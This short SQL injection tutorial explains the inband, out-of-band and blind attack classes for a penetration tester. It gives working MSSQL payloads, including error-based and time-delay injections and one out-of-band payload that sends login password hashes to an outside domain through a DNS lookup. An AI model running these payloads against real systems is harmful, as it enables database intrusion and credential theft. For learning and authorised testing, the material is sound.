SQL Injection can be broken up into 3 classes:
Inband - data is extracted using the same channel that is used to inject the SQL code.
This is the most straightforward kind of attack, in which the retrieved data is presented
directly in the application web page
Out-of-Band - data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester)
Inferential - there is no actual transfer of data, but the tester is able to reconstruct the
information by sending particular requests and observing the resulting behaviour of the
website/DB Server.
--------------------------------------------------------------------------------------------------------------
INBAND:
Data is extracted using the same channel that is used to inject the SQL
code.
This is the most straightforward kind of attack, in which the retrieved data is
presented directly in the application web page
So this is our Error-Based, and Union-Based SQL Injections
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[j0e]' to a column of data type int.
I
--------------------------------------------------------------------------------------------------------------
OUT-OF-BOUND:
Data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester).
This is another way of getting the data out of the server (such as http, or dns).
http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--
--------------------------------------------------------------------------------------------------------------
INFERENTIAL:
If the application returns an error message generated by an incorrect query,
then it is easy to reconstruct the logic of the original query and therefore
understand how to perform the injection correctly.
However, if the application hides the error details, then the tester must be
able to reverse engineer the logic of the original query.
The latter case is known as "Blind SQL Injection".
http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'--
Ask it if it's running as 'sa'
--------------------------------------------------------------------------------------------------------------
SQL Injection Types:
Error-Based SQL Injection
Union-Based SQL Injection
Blind SQL Injection
Error:
Asking the DB a question that will cause an error, and gleening information from the
error.
Union:
The SQL UNION is used to combine the results of two or more SELECT SQL
statements into a single result. Really useful for SQL Injection Smiling
Blind:
Asking the DB a true/false question and using whether valid page returned or not, or by using
the time it took for your valid page to return as the answer to the question.
WHY FOCUS ON MANUAL TESTING INSTEAD OF TOOLS?:
- SQL Injection Scanners will generally look for 1 type of injection.....
- The scanner may tell you the site isn't vulnerable when it really is.
